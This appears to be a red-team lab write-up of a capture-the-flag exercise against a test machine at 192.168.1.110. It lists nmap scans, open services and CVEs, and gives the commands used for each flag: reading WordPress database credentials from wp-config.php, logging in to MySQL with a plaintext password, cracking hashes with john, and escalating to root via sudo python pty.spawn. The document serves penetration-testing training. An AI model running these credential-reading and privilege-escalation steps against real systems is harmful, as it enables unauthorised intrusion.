# Red Team: Summary of Operations

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### Exposed Services

1. *Find all machines on the network*

Nmap -sP 192.168.1.1-255

Graphical user interface, text

Description automatically generated

Nmap scan results for each machine reveal the below services and OS details:

$ nmap -sV 192.168.1.110

A screenshot of a computer

Description automatically generated with medium confidence

This scan identifies the services below as potential points of entry: - Target 1 - This scan identifies the services below as potential points of entry:

|  |  |  |  |  |
| --- | --- | --- | --- | --- |
| **Port** | **Type** | **State** | **Service** | **Version** |
| 22 | TCP | Open | SSH | OpenSSH 6.7p1 |
| 80 | TCP | Open | httpd | Apache 2.4.10 |
| 111 | TCP | Open | rpcbind | 2-4 |
| 139 | TCP | Open | Netbios-ssn | Samba 3.x – 4.x |
| 445 | TCP | Open | Netbios-ssn | Samba 3.x – 4.x |

The following vulnerabilities were identified on Target 1:

Target 1

CVE-2021-28041 open SSH

CVE-2017-15710 Apache https 2.4.10

CVE-2017-8779 exploit on open rpcbind port could lead to remote DoS

CVE-2017-7494 Samba NetBIOSExploitation

The Red Team was able to penetrate Target 1 and retrieve the following confidential data: - Target 1

- **flag1.txt**: flag1{b9bbcb33e11b80be759c4e844862482d}

- **Exploit Used:** curl

- **Command used**: curl <http://192.168.1.110/service.html> | grep flag

Graphical user interface, text

Description automatically generated

- flag2: flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

- **Exploit Used** -  *ssh in to 192.168.1.110 using Michael’s account*

*find / -type f -name 'flag\*.txt' 2>/dev/null*

- *Command Used: cat /var/www/flag2.txt*

*Text

Description automatically generated*

- flag3: flag3{afc01ab56b50591e7dccf93122770cd2}

- **Exploit Used** – Use wordpress DB information retrieved from wordpress configuration

cat /var/www/html/wordpress/wp-config.php | grep -i db

Graphical user interface, text, chat or text message

Description automatically generated

Access the mysql db

mysql -u root -pR@v3nSecurity

show databases;

Text

Description automatically generated

- *Command Used to get the flag 3:*

*use wordpress; select post\_content from wp\_posts where post\_content like 'flag%';*

*Graphical user interface, text

Description automatically generated*

- flag4: flag4{715dea6c055b9fe3337544932f2941ce}

- **Exploit Used**

Exploit option 1:

- *Query wordpress DB*

- *Command Used: select post\_content from wp\_posts where post\_content like 'flag%';*

Exploit option 2:

* Used john to crack the password hash obtained from MySQL database, secured a new user shell as Steven, escalated to root.
* Cracking the password hash with john/johnny

Graphical user interface, application

Description automatically generated

* ssh using steven’s account to 192.168.1.110
* Escalating to root using the command: sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
* Run command to find the file: find / -type f -name 'flag\*.txt' 2>/dev/null
* Read the flag4 file: cat /root/flag4.txt

Text

Description automatically generated